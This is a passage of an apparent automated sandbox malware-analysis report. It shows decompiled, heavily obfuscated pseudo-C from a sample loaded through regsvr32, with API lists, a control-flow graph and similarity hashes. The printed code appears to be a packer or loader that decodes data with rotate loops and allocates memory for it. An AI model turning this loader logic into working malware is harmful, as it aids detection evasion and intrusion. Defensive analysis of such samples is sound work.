                                          						_t158 =  *((intOrPtr*)(_t185 + 0x4410a0))( *((intOrPtr*)(_t185 + 0x435681)),  *((intOrPtr*)(_t185 + 0x4353d2)),  *((intOrPtr*)(_t185 + 0x4354ba)),  *((intOrPtr*)(_t185 + 0x435796)),  *((intOrPtr*)(_t185 + 0x4354a2)), 0xdf, 0x400, _t193);
                                          						 *(_t244 - 8) = _t193;
                                          						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) & 0x00000000;
                                          						 *(_t185 + 0x435520) =  *(_t185 + 0x435520) | _t193 & 0x00000000 ^ _t158;
                                          						_t193 =  *_t246;
                                          						_t246 =  &(_t246[1]);
                                          					}
                                          					_push(_t226);
                                          					if( *(_t185 + 0x4353c6) == 0) {
                                          						_t158 =  *((intOrPtr*)(_t185 + 0x44105c))(_t193);
                                          						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) & 0x00000000;
                                          						 *(_t185 + 0x4353c6) =  *(_t185 + 0x4353c6) ^ _t237 & 0x00000000 ^ _t158;
                                          						_t237 = _t237;
                                          						_t193 = (_t193 & 0x00000000) +  *_t246;
                                          						_t246 = _t246 - 0xfffffffc;
                                          					}
                                          					_t158 = E001A4495(_t158, _t185, _t193, _t215, _t226, _t237);
                                          				}
                                          				 *_t246 =  *_t246 ^ _t158;
                                          				_t159 = _t158;
                                          				if( *(_t185 + 0x435855) == 0) {
                                          					_t166 =  *((intOrPtr*)(_t185 + 0x4410a4))( *((intOrPtr*)(_t185 + 0x435615)), _t159);
                                          					 *(_t244 - 8) = _t226;
                                          					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) & 0x00000000;
                                          					 *(_t185 + 0x435855) =  *(_t185 + 0x435855) ^ (_t226 -  *(_t244 - 8) | _t166);
                                          					_t226 =  *(_t244 - 8);
                                          					_pop( *_t113);
                                          					_t193 =  *(_t244 - 8);
                                          					 *_t115 = _t193;
                                          					_t159 = _t166 & 0x00000000 ^  *(_t244 - 4);
                                          				}
                                          				_t160 = memset(_t226, _t159, _t193 << 0);
                                          				_t227 = _t226 + _t193;
                                          				_t194 = 0;
                                          				if( *(_t185 + 0x4353ce) == 0) {
                                          					_t160 =  *((intOrPtr*)(_t185 + 0x441068))(_t185 + 0x4359ac);
                                          					 *(_t244 - 4) = _t215;
                                          					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) & 0x00000000;
                                          					 *(_t185 + 0x4353ce) =  *(_t185 + 0x4353ce) | _t215 -  *(_t244 - 4) | _t160;
                                          					_t215 =  *(_t244 - 4);
                                          				}
                                          				if( *((intOrPtr*)(_t185 + 0x43574e)) != _t185) {
                                          					if( *(_t185 + 0x4357d6) == 0) {
                                          						_t164 =  *((intOrPtr*)(_t185 + 0x441058))();
                                          						 *(_t244 - 8) = _t237;
                                          						 *(_t185 + 0x4357d6) = 0 ^ _t164;
                                          						_t237 =  *(_t244 - 8);
                                          					}
                                          					_push( *((intOrPtr*)(_t185 + 0x43574e)));
                                          					if( *((intOrPtr*)(_t185 + 0x435177)) == 0) {
                                          						_t163 =  *((intOrPtr*)(_t185 + 0x441064))(_t185 + 0x4351ff);
                                          						 *(_t244 - 8) = _t194;
                                          						 *((intOrPtr*)(_t185 + 0x435177)) = _t163;
                                          						_t194 =  *(_t244 - 8);
                                          					}
                                          					_t161 = E001A242A(_t185, _t194, _t215, _t227, _t237); // executed
                                          					if( *((intOrPtr*)(_t185 + 0x43536a)) == 0) {
                                          						 *_t144 =  *((intOrPtr*)(_t185 + 0x4410a8))(0,  *((intOrPtr*)(_t185 + 0x43549e)));
                                          						 *_t146 =  *(_t244 - 4);
                                          					}
                                          					_t160 = E001A3658(_t161, _t185, _t215, _t227, _t237,  *((intOrPtr*)(_t185 + 0x43574e)));
                                          				}
                                          				 *(_t244 - 8) = _t194;
                                          				 *_t151 = _t215 & 0x00000000 ^ (_t194 & 0x00000000 |  *(_t185 + 0x4351a7));
                                          				 *_t153 =  *(_t244 - 4);
                                          				asm("popad");
                                          				return _t160;
                                          			}

                                          APIs
                                          • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 001A14AB
                                          • VirtualProtect.KERNEL32(?), ref: 001A15B1
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.635169240.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_1a0000_regsvr32.jbxd
                                          Similarity
                                          • API ID: Virtual$AllocProtect
                                          • String ID:
                                          • API String ID: 2447062925-0
                                          • Opcode ID: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
                                          • Instruction ID: f4e9f3735b91120e9e1ed450e84c96c79fdaeabc957f3563868a10ac579f7aa7
                                          • Opcode Fuzzy Hash: 22e667abeca61440a8b0fec79a75a9c4ed0bf930217f70a32a92829f77582f46
                                          • Instruction Fuzzy Hash: 55C15D76904604EFFF18CFA0C889B597BB1FF28311F1860A9ED0D9E19AC77415A4CB28
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 543 1a32eb-1a3307 545 1a330d-1a3319 543->545 546 1a331b-1a3334 545->546 547 1a3337 545->547 546->547 548 1a333e-1a3352 547->548 550 1a336a-1a3381 548->550 551 1a3354-1a3367 OleUninitialize 548->551 552 1a3383-1a33a3 550->552 553 1a33a6-1a33c2 550->553 551->550 552->553 556 1a33f2-1a341a 553->556 557 1a33c4-1a33ef 553->557 558 1a341c-1a3443 556->558 559 1a3446-1a344e 556->559 557->556 558->559 561 1a3454-1a345b 559->561 562 1a3205-1a320b 559->562 565 1a347a-1a3489 561->565 566 1a345d-1a3479 561->566 562->545 563 1a3211-1a3218 562->563 569 1a321a-1a3233 563->569 570 1a3236-1a323e 563->570 567 1a348f-1a3496 565->567 568 1a3003-1a3006 565->568 566->565 573 1a3498-1a34b3 OleInitialize 567->573 574 1a34b4-1a34b8 567->574 571 1a309c-1a30a5 568->571 572 1a300c-1a3013 568->572 569->570 575 1a3240-1a3260 570->575 576 1a3261-1a326d 570->576 582 1a30a8-1a30b2 571->582 578 1a3035-1a303c 572->578 579 1a3015-1a3032 572->579 573->574 574->568 580 1a34be-1a34d7 574->580 575->576 583 1a326f-1a3291 576->583 584 1a3294-1a32a7 576->584 587 1a303e-1a3060 578->587 588 1a3063-1a3070 578->588 579->578 589 1a30d4-1a30e8 582->589 590 1a30b4-1a30d3 582->590 583->584 585 1a32a9-1a32cb 584->585 586 1a32ce-1a32e8 584->586 585->586 586->548 587->588 588->582 593 1a30ea-1a310f 589->593 594 1a3112-1a311c 589->594 590->589 593->594 597 1a311e-1a3140 594->597 598 1a3143-1a315a 594->598 597->598 602 1a315c-1a3181 598->602 603 1a3184-1a318e 598->603 602->603 605 1a31c2-1a31ca 603->605 606 1a3190-1a31bf 603->606 608 1a31cc-1a31ee 605->608 609 1a31f1-1a3204 LoadLibraryA 605->609 606->605 608->609 609->562
                                          APIs
                                          • OleUninitialize.OLE32(001A2C25), ref: 001A3354
                                          • OleInitialize.OLE32(00000000,00000000), ref: 001A349A
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.635169240.00000000001A0000.00000040.00000001.sdmp, Offset: 001A0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_1a0000_regsvr32.jbxd
                                          Similarity
                                          • API ID: InitializeUninitialize
                                          • String ID:
                                          • API String ID: 3442037557-0
                                          • Opcode ID: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
                                          • Instruction ID: 7d376cb36cbbcc91f3d53f130d63f9145d048fc75d120624b025f28bf21382c7
                                          • Opcode Fuzzy Hash: b3e2ec72f7409a1985b0da953e772d2d78d9d955f9ccdd8e3959b9227137adb3
                                          • Instruction Fuzzy Hash: 18518D72D04619DFEF14CFA4C8897AABBB1FF18311F08556AED49AE189C7341590CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 78%
                                          			E001A3726(void* __ebx, signed int __ecx, void* __edx, signed int __edi, void* __esi, intOrPtr _a4, signed int _a8) {
                                          				char _v8;
                                          				signed int _v12;
                                          				signed int _v16;
                                          				signed int _v20;
                                          				signed int _t416;
                                          				signed int _t417;
                                          				signed int _t421;
                                          				void* _t425;
                                          				signed int _t427;
                                          				signed int _t429;
                                          				signed int _t434;
                                          				signed int _t436;
                                          				signed int _t438;
                                          				signed int _t440;
                                          				signed int _t441;
                                          				signed int _t443;
                                          				signed int _t446;
                                          				signed int _t450;
                                          				signed int _t451;
                                          				signed int _t453;
                                          				signed int _t454;
                                          				signed int _t455;
                                          				intOrPtr _t457;
                                          				signed int _t459;
                                          				signed int _t461;
                                          				signed int _t462;
                                          				signed int _t465;
                                          				signed int _t466;
                                          				signed int _t468;
                                          				signed int _t469;
                                          				signed int _t471;
                                          				signed int _t473;
                                          				signed int _t476;
                                          				signed int _t477;
                                          				signed int _t478;
                                          				signed int _t480;
                                          				signed int _t481;
                                          				signed int _t486;
                                          				signed int _t489;
                                          				void* _t493;
                                          				void* _t495;
                                          				signed int _t497;
                                          				signed int _t500;
                                          				void* _t503;
                                          				signed int _t504;
                                          				signed int _t507;
                                          				signed int _t509;
                                          				signed int _t512;
                                          				signed int _t514;
                                          				signed int _t515;
                                          				signed int _t520;
                                          				signed int _t525;
                                          				int _t527;
                                          				int _t531;
                                          				void* _t567;
                                          				signed int _t568;
                                          				signed int _t570;
                                          				signed int _t584;
                                          				signed int _t585;
                                          				signed int _t587;
                                          				void* _t590;
                                          				void* _t592;
                                          				void* _t625;
                                          				intOrPtr* _t626;
                                          				signed int _t627;
                                          				void* _t629;
                                          				signed int _t634;
                                          				signed int _t637;
                                          				signed int _t639;
                                          				void* _t640;
                                          				void* _t641;
                                          				signed int _t657;
                                          				signed int _t660;
                                          				signed int* _t672;
                                          				signed int* _t673;
                                          				signed int* _t676;
                                          				intOrPtr* _t677;
                                          				signed int* _t678;
                                          
                                          				_t625 = __esi;
                                          				_t584 = __edi;
                                          				_t567 = __edx;
                                          				_t504 = __ecx;
                                          				_t493 = __ebx;
                                          				if( *((intOrPtr*)(__ebx + 0x435126)) == 0) {
                                          					_push(__ebx + 0x4354be);
                                          					 *_t4 =  *((intOrPtr*)(__ebx + 0x44106c))();
                                          					_push(_v20);
                                          					_pop( *_t6);
                                          				}
                                          				_t416 = _t493 + 0x435323;
                                          				if( *(_t493 + 0x4351eb) == 0) {
                                          					_t489 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x43521f, _t416);
                                          					 *_t672 = _t657;
                                          					 *(_t493 + 0x4351eb) = 0 ^ _t489;
                                          					_t657 = 0;
                                          					_t416 =  *_t672;
                                          					_t672 = _t672 - 0xfffffffc;
                                          				}
                                          				_push(_t416);
                                          				_t417 = _t493 + 0x43569a;
                                          				if( *(_t493 + 0x4354fd) == 0) {
                                          					_t486 =  *((intOrPtr*)(_t493 + 0x44105c))(_t417);
                                          					_v12 = _t584;
                                          					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) & 0x00000000;
                                          					 *(_t493 + 0x4354fd) =  *(_t493 + 0x4354fd) | _t584 - _v12 | _t486;
                                          					_t584 = _v12;
                                          					_t417 =  *_t672;
                                          					_t672 = _t672 - 0xfffffffc;
                                          				}
                                          				 *_t23 =  *((intOrPtr*)(_t493 + 0x441044))(_t417);
                                          				_push(_v16);
                                          				_pop( *_t25);
                                          				if( *((intOrPtr*)(_t493 + 0x43599c)) == 0) {
                                          					 *_t29 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4357a6)));
                                          					_push(_v12);
                                          					_pop( *_t31);
                                          				}
                                          				_push(_t625);
                                          				if( *((intOrPtr*)(_t493 + 0x435611)) == 0) {
                                          					_t481 = _t493 + 0x4353d6;
                                          					if( *((intOrPtr*)(_t493 + 0x4356e9)) == 0) {
                                          						 *_t37 =  *((intOrPtr*)(_t493 + 0x441070))( *((intOrPtr*)(_t493 + 0x43584d)), _t481);
                                          						_push(_v20);
                                          						_pop( *_t39);
                                          						_t481 =  *_t672;
                                          						_t672 = _t672 - 0xfffffffc;
                                          					}
                                          					 *_t41 =  *((intOrPtr*)(_t493 + 0x441054))(_t481);
                                          					_push(_v12);
                                          					_pop( *_t43);
                                          				}
                                          				_push(_t584);
                                          				if( *(_t493 + 0x4356f5) == 0) {
                                          					_t480 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x43594c)),  *((intOrPtr*)(_t493 + 0x435112)));
                                          					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) & 0x00000000;
                                          					 *(_t493 + 0x4356f5) =  *(_t493 + 0x4356f5) ^ _t504 & 0x00000000 ^ _t480;
                                          					_t504 = _t504;
                                          				}
                                          				_push(_a4);
                                          				_pop( *_t53);
                                          				_push(_v12);
                                          				_pop(_t626);
                                          				if( *(_t493 + 0x4358dc) == 0) {
                                          					_t476 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x43592c, _t493 + 0x435509);
                                          					_v16 = _t584;
                                          					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) & 0x00000000;
                                          					 *(_t493 + 0x4353ca) =  *(_t493 + 0x4353ca) ^ _t584 ^ _v16 ^ _t476;
                                          					_t477 =  *((intOrPtr*)(_t493 + 0x441060))();
                                          					if( *(_t493 + 0x435268) == 0) {
                                          						_t478 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4354da)), _t477);
                                          						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) & 0x00000000;
                                          						 *(_t493 + 0x435268) =  *(_t493 + 0x435268) | _t567 ^  *_t672 ^ _t478;
                                          						_t567 = _t567;
                                          						_t477 =  *_t672;
                                          						_t672 =  &(_t672[1]);
                                          					}
                                          					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) & 0x00000000;
                                          					 *(_t493 + 0x4358dc) =  *(_t493 + 0x4358dc) | _t626 -  *_t672 ^ _t477;
                                          					_t626 = _t626;
                                          				}
                                          				_v12 = _t504;
                                          				_t585 = 0 ^ _a8;
                                          				_t507 = _v12;
                                          				if( *(_t493 + 0x435675) == 0) {
                                          					_t473 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435994);
                                          					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) & 0x00000000;
                                          					 *(_t493 + 0x435675) =  *(_t493 + 0x435675) | _t507 & 0x00000000 ^ _t473;
                                          					_t507 = _t507;
                                          				}
                                          				if( *(_t493 + 0x435732) == 0) {
                                          					if( *(_t493 + 0x435142) == 0) {
                                          						_t471 =  *((intOrPtr*)(_t493 + 0x441060))();
                                          						_v16 = _t626;
                                          						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) & 0x00000000;
                                          						 *(_t493 + 0x435142) =  *(_t493 + 0x435142) | _t626 - _v16 | _t471;
                                          						_t626 = _v16;
                                          					}
                                          					_t469 =  *((intOrPtr*)(_t493 + 0x44105c))();
                                          					_v20 = _t507;
                                          					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) & 0x00000000;
                                          					 *(_t493 + 0x435732) =  *(_t493 + 0x435732) ^ _t507 ^ _v20 ^ _t469;
                                          					if( *((intOrPtr*)(_t493 + 0x43545a)) == 0) {
                                          						 *_t113 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x4357c2)),  *((intOrPtr*)(_t493 + 0x4350a0)), 0x61,  *((intOrPtr*)(_t493 + 0x43587c)),  *((intOrPtr*)(_t493 + 0x4356ad)),  *((intOrPtr*)(_t493 + 0x435819)), 0x400);
                                          						_push(_v12);
                                          						_pop( *_t115);
                                          					}
                                          				}
                                          				_push( *((intOrPtr*)(_t626 + 8)));
                                          				if( *(_t493 + 0x435898) == 0) {
                                          					_t468 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435290);
                                          					_v12 = _t585;
                                          					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) & 0x00000000;
                                          					 *(_t493 + 0x435898) =  *(_t493 + 0x435898) ^ (_t585 & 0x00000000 | _t468);
                                          					_t585 = _v12;
                                          				}
                                          				_push(_t585);
                                          				if( *(_t493 + 0x4358d8) == 0) {
                                          					_t466 =  *((intOrPtr*)(_t493 + 0x441070))(0);
                                          					 *_t672 = _t567;
                                          					 *(_t493 + 0x4358d8) = 0 ^ _t466;
                                          					_t567 = 0;
                                          				}
                                          				if( *((intOrPtr*)(_t493 + 0x435456)) == 0) {
                                          					if( *(_t493 + 0x4355f9) == 0) {
                                          						_t465 =  *((intOrPtr*)(_t493 + 0x441070))(0);
                                          						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) & 0x00000000;
                                          						 *(_t493 + 0x4355f9) =  *(_t493 + 0x4355f9) ^ (_t585 & 0x00000000 | _t465);
                                          						_t585 = _t585;
                                          					}
                                          					_t462 =  *((intOrPtr*)(_t493 + 0x4410a4))(1);
                                          					if( *((intOrPtr*)(_t493 + 0x4359a0)) == 0) {
                                          						 *_t143 =  *((intOrPtr*)(_t493 + 0x4410a0))(0, 0,  *((intOrPtr*)(_t493 + 0x435940)), 0x4c,  *((intOrPtr*)(_t493 + 0x435665)),  *((intOrPtr*)(_t493 + 0x435a51)),  *((intOrPtr*)(_t493 + 0x435a15)), _t462);
                                          						_push(_v16);
                                          						_pop( *_t145);
                                          						_t462 =  *_t672;
                                          						_t672 = _t672 - 0xfffffffc;
                                          					}
                                          					 *_t146 = _t462;
                                          					_push(_v16);
                                          					_pop( *_t148);
                                          				}
                                          				 *_t150 =  *((intOrPtr*)(_t493 + 0x435280));
                                          				_push(_v12);
                                          				_t509 =  &_v20;
                                          				_t660 = _t657;
                                          				_push(_t509);
                                          				if( *(_t493 + 0x4359bd) == 0) {
                                          					_t461 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x435880, _t509);
                                          					_v20 = _t509;
                                          					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) & 0x00000000;
                                          					 *(_t493 + 0x4359bd) =  *(_t493 + 0x4359bd) | _t509 - _v20 ^ _t461;
                                          					_t509 = (_v20 & 0x00000000) +  *_t672;
                                          					_t672 = _t672 - 0xfffffffc;
                                          				}
                                          				_t627 = _t626 +  *_t626;
                                          				if( *(_t493 + 0x4357f2) == 0) {
                                          					_push(_t509);
                                          					if( *(_t493 + 0x4355bd) == 0) {
                                          						_t459 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x43509c);
                                          						_v16 = _t627;
                                          						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) & 0x00000000;
                                          						 *(_t493 + 0x4355bd) =  *(_t493 + 0x4355bd) | _t627 & 0x00000000 ^ _t459;
                                          						_t627 = _v16;
                                          					}
                                          					_push( *((intOrPtr*)(_t493 + 0x4350ac)));
                                          					_push(0xc);
                                          					if( *((intOrPtr*)(_t493 + 0x435894)) == 0) {
                                          						_t457 =  *((intOrPtr*)(_t493 + 0x441068))(_t493 + 0x4359a4);
                                          						 *_t672 = _t627;
                                          						 *((intOrPtr*)(_t493 + 0x435894)) = _t457;
                                          						_t627 = 0;
                                          					}
                                          					_push( *((intOrPtr*)(_t493 + 0x435346)));
                                          					if( *(_t493 + 0x435815) == 0) {
                                          						_t455 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x435776)), 4);
                                          						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) & 0x00000000;
                                          						 *(_t493 + 0x435815) =  *(_t493 + 0x435815) ^ (_t627 & 0x00000000 | _t455);
                                          						_t627 = _t627;
                                          					}
                                          					_push(0x2e);
                                          					_push( *((intOrPtr*)(_t493 + 0x435a19)));
                                          					if( *(_t493 + 0x435a09) == 0) {
                                          						_t454 =  *((intOrPtr*)(_t493 + 0x4410a8))( *((intOrPtr*)(_t493 + 0x4356f1)),  *((intOrPtr*)(_t493 + 0x43544a)));
                                          						_v12 = _t509;
                                          						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) & 0x00000000;
                                          						 *(_t493 + 0x435a09) =  *(_t493 + 0x435a09) | _t509 ^ _v12 ^ _t454;
                                          						_t509 = _v12;
                                          					}
                                          					_t451 =  *((intOrPtr*)(_t493 + 0x4410a0))( *((intOrPtr*)(_t493 + 0x435639)),  *((intOrPtr*)(_t493 + 0x435317)));
                                          					if( *(_t493 + 0x4359dd) == 0) {
                                          						_t453 =  *((intOrPtr*)(_t493 + 0x441054))(_t493 + 0x435432, _t451);
                                          						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) & 0x00000000;
                                          						 *(_t493 + 0x4359dd) =  *(_t493 + 0x4359dd) ^ (_t509 ^  *_t672 | _t453);
                                          						_t509 = _t509;
                                          						_pop( *_t207);
                                          						_t451 = _v12;
                                          					}
                                          					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) & 0x00000000;
                                          					 *(_t493 + 0x4357f2) =  *(_t493 + 0x4357f2) | _t660 -  *_t672 | _t451;
                                          					_t660 = _t660;
                                          					_t509 =  *_t672;
                                          					_t672 = _t672 - 0xfffffffc;
                                          				}
                                          				do {
                                          					asm("movsb");
                                          					_t509 = _t509 - 1;
                                          				} while (_t509 != 0);
                                          				_t421 =  *((intOrPtr*)(_t493 + 0x441044))(_t493 + 0x435812, _t493 + 0x4356cd);
                                          				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) & 0x00000000;
                                          				 *(_t493 + 0x43558d) =  *(_t493 + 0x43558d) | _t509 & 0x00000000 ^ _t421;
                                          				_t512 = _t509;
                                          				if( *(_t493 + 0x4355d5) == 0) {
                                          					_push(_t493 + 0x435736);
                                          					if( *(_t493 + 0x4352bf) == 0) {
                                          						_t450 =  *((intOrPtr*)(_t493 + 0x44106c))(_t493 + 0x4358fc);
                                          						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) & 0x00000000;
                                          						 *(_t493 + 0x4352bf) =  *(_t493 + 0x4352bf) ^ (_t585 & 0x00000000 | _t450);
                                          						_t585 = _t585;
                                          					}
                                          					_t421 =  *((intOrPtr*)(_t493 + 0x44106c))();
                                          					_push(_t585);
                                          					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) & 0x00000000;
                                          					 *(_t493 + 0x4355d5) =  *(_t493 + 0x4355d5) | _t585 -  *_t672 | _t421;
                                          					if( *(_t493 + 0x435264) == 0) {
                                          						_t421 =  *((intOrPtr*)(_t493 + 0x441064))(_t493 + 0x435070);
                                          						_v12 = _t567;
                                          						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) & 0x00000000;
                                          						 *(_t493 + 0x435264) =  *(_t493 + 0x435264) | _t567 & 0x00000000 | _t421;
                                          						_t567 = _v12;
                                          					}
                                          				}
                                          				_pop( *_t243);
                                          				_t514 = _t512 & 0x00000000 ^ _v20;
                                          				if( *(_t493 + 0x4359ed) == 0) {
                                          					_t421 =  *((intOrPtr*)(_t493 + 0x44105c))(_t514);
                                          					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) & 0x00000000;
                                          					 *(_t493 + 0x4359ed) =  *(_t493 + 0x4359ed) | _t660 & 0x00000000 | _t421;
                                          					_t660 = _t660;
                                          					_t514 =  *_t672;
                                          					_t672 =  &(_t672[1]);
                                          				}
                                          				_t587 =  *_t672;
                                          				_t673 =  &(_t672[1]);
                                          				if( *(_t493 + 0x4351b7) == 0) {
                                          					_t421 =  *((intOrPtr*)(_t493 + 0x4410a4))( *((intOrPtr*)(_t493 + 0x4352a0)), _t514);
                                          					_v16 = _t514;
                                          					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) & 0x00000000;
                                          					 *(_t493 + 0x4351b7) =  *(_t493 + 0x4351b7) | _t514 - _v16 | _t421;
                                          					_pop( *_t261);
                                          					_t514 = _v16;
                                          				}
                                          				_v12 = _t421;
                                          				_t629 = _t627 & 0x00000000 | _t421 ^ _v12 | _t587;
                                          				_push(_t493);
                                          				do {
                                          					_t425 =  *_t629 & 0x000000ff;
                                          					_t629 = _t629 + 1;
                                          					if(_t425 == 0) {
                                          						goto L64;
                                          					}
                                          					_push(_t514);
                                          					 *_t673 = 1;
                                          					_t515 = _t629;
                                          					 *_t266 = _t629;
                                          					_push(_v20);
                                          					_pop(_t567);
                                          					_v8 = 8;
                                          					do {
                                          						asm("rol eax, cl");
                                          						_t495 = _t425;
                                          						_t425 = _t567;
                                          						asm("ror ebx, cl");
                                          						_t269 =  &_v8;
                                          						 *_t269 = _v8 - 1;
                                          					} while ( *_t269 != 0);
                                          					 *_t673 = _t515;
                                          					_t425 = _t495;
                                          					 *_t271 = 0;
                                          					_t514 = 0 ^ _v12;
                                          					L64:
                                          					asm("stosb");
                                          					_t514 = _t514 - 1;
                                          				} while (_t514 != 0);
                                          				_pop( *_t273);
                                          				_t497 = 0 ^ _v12;
                                          				if( *((intOrPtr*)(_t497 + 0x4354f9)) == 0) {
                                          					_t425 =  *((intOrPtr*)(_t497 + 0x4410a8))( *((intOrPtr*)(_t497 + 0x43541a)),  *((intOrPtr*)(_t497 + 0x4351cf)));
                                          					 *_t279 = _t425;
                                          					_push(_v12);
                                          					_pop( *_t281);
                                          				}
                                          				if( *(_t497 + 0x435122) == 0) {
                                          					_t283 = _t497 + 0x435182; // 0x435182
                                          					if( *(_t497 + 0x4357e2) == 0) {
                                          						_t446 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x435671)));
                                          						_v12 = _t587;
                                          						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) & 0x00000000;
                                          						 *(_t497 + 0x4357e2) =  *(_t497 + 0x4357e2) ^ _t587 - _v12 ^ _t446;
                                          						_t587 = _v12;
                                          					}
                                          					_t425 =  *((intOrPtr*)(_t497 + 0x441064))();
                                          					_v20 = _t567;
                                          					 *(_t497 + 0x435122) = _t425;
                                          					_t567 = _v20;
                                          					if( *(_t497 + 0x4354ca) == 0) {
                                          						_t425 =  *((intOrPtr*)(_t497 + 0x44105c))();
                                          						 *_t673 = _t660;
                                          						 *(_t497 + 0x4354ca) = _t425;
                                          						_t660 = 0;
                                          					}
                                          				}
                                          				if(_a4 != 0) {
                                          					if( *(_t497 + 0x435250) == 0) {
                                          						_t303 = _t497 + 0x4358c0; // 0x4358c0
                                          						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t303);
                                          						 *_t673 = _t629;
                                          						 *(_t497 + 0x435250) = 0 ^ _t425;
                                          						_t629 = 0;
                                          					}
                                          					if(_a8 != 0) {
                                          						if( *(_t497 + 0x435213) == 0) {
                                          							_t443 =  *((intOrPtr*)(_t497 + 0x441060))();
                                          							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) & 0x00000000;
                                          							 *(_t497 + 0x435213) =  *(_t497 + 0x435213) | _t587 -  *_t673 ^ _t443;
                                          							_t587 = _t587;
                                          						}
                                          						_t425 = E001A1C5D(_t497, _t514, _t567, _t629, _a8, _a4);
                                          					}
                                          				}
                                          				_pop( *_t315);
                                          				_t568 = _v20;
                                          				if( *(_t497 + 0x4352f3) == 0) {
                                          					_t425 =  *((intOrPtr*)(_t497 + 0x441070))( *((intOrPtr*)(_t497 + 0x43531f)), _t568);
                                          					_push(_t514);
                                          					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) & 0x00000000;
                                          					 *(_t497 + 0x4352f3) =  *(_t497 + 0x4352f3) ^ (_t514 -  *_t673 | _t425);
                                          					_t568 =  *_t673;
                                          					_t673 = _t673 - 0xfffffffc;
                                          				}
                                          				if(_t568 > 0) {
                                          					if( *(_t497 + 0x4354b6) == 0) {
                                          						_t425 =  *((intOrPtr*)(_t497 + 0x4410a0))( *((intOrPtr*)(_t497 + 0x435088)),  *((intOrPtr*)(_t497 + 0x435412)),  *((intOrPtr*)(_t497 + 0x4355a1)), 0xd,  *((intOrPtr*)(_t497 + 0x43577e)),  *((intOrPtr*)(_t497 + 0x435298)), 0x400);
                                          						_v12 = _t587;
                                          						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) & 0x00000000;
                                          						 *(_t497 + 0x4354b6) =  *(_t497 + 0x4354b6) ^ (_t587 - _v12 | _t425);
                                          					}
                                          					_push(_a4);
                                          					_pop( *_t339);
                                          					_push(_v16);
                                          					_pop(_t590);
                                          					_push(_t590);
                                          					 *_t673 = _t629;
                                          					_t520 =  *(_t590 + 4);
                                          					_t634 = 0;
                                          					if( *(_t497 + 0x4350bc) == 0) {
                                          						_t343 = _t497 + 0x4355b5; // 0x4355b5
                                          						_t425 =  *((intOrPtr*)(_t497 + 0x441068))(_t343, _t520);
                                          						_push(0);
                                          						 *_t673 = _t660;
                                          						 *(_t497 + 0x4350bc) = 0 ^ _t425;
                                          						_t520 =  *_t673;
                                          						_t673 =  &(_t673[1]);
                                          					}
                                          					_v16 = _t497;
                                          					_t427 = _t425 & 0x00000000 ^ _t497 & 0x00000000 ^  *(_t590 + 8);
                                          					_t500 = _v16;
                                          					if( *(_t500 + 0x435659) == 0) {
                                          						_t441 =  *((intOrPtr*)(_t500 + 0x441060))();
                                          						_v12 = _t590;
                                          						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) & 0x00000000;
                                          						 *(_t500 + 0x435659) =  *(_t500 + 0x435659) ^ _t590 & 0x00000000 ^ _t441;
                                          						_t590 = _v12;
                                          						 *_t357 = _t520;
                                          						_t520 = _t520 & 0x00000000 ^ _v12;
                                          						 *_t359 = _t427;
                                          						_t427 = _v16;
                                          					}
                                          					_push(_t520);
                                          					_push(_t520);
